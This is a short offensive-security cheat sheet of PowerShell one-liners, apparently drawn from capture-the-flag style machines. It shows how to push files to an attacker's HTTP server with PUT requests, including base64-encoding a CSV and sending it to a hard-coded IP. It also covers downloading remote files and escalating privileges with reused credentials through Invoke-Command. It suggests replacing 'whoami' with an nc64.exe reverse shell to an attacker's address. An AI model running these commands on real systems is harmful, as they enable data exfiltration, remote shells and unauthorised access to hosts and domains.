Upload file via PowerShell
>wget https://raw.githubusercontent.com/w0lfram1te/extended-http-server/main/ehttpserver.py
python3 ehttpserver.pyPython simple http server doesn’t support PUT request. We need to use the other one
>powershell -c "invoke-webrequest -method PUT -usebasicparsing -uri http://[IP]:[Port]/[FILE] -body (get-content [FILE_Upload])"
StatusCode : 201
StatusDescription : Created
Content : {} ... Use invoke-webrequest PUT to upload the file to the python server
>powershell -c "$Base64String = [System.convert]::ToBase64String((Get-Content -Path 'acls.csv' -Encoding Byte)); invoke-webrequest -method PUT -usebasicparsing -uri http://10.10.16.6:8000/base64.txt -body $Base64String"One liner version with the base64 encoding
PowerShell download from URL
>Invoke-WebRequest "[URL]" -OutFile "[path]\[filename]"
>wget "[URL]" -OutFile "[path]\[filename]"
>(New-Object System.Net.WebClient).DownloadFile("[URL]","[path]\[filename]")
>curl.exe -Lo "[path]\[filename]" "URL"Download the resource from the URL. wget is the alias of Invoke-WebRequest. curl.exe is not equal to curl!!!
PowerShell Runas for PrivEsc
>$user = "Sniper\Chris"
>$pass = "12345qwert"
>$secstr = New-Object -TypeName System.Security.SecureString
>$pass.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
>$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $secstr
>Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost
sniper\chrisPrivEsc from the normal user to a privilege user(chris). Modify the “whoami” to do more tricks. For example, get a shell by replace ‘whoami’ to ‘\\[IP]\share\nc64.exe -e cmd [Attacker’s IP] [Port]’
>runas /netonly /user:[domain]\[User] powershell.exe
>net view \\[domain IP]\Runas the other user against the remote domain controller. Use net view to check if the runas user can list the share drives or not.
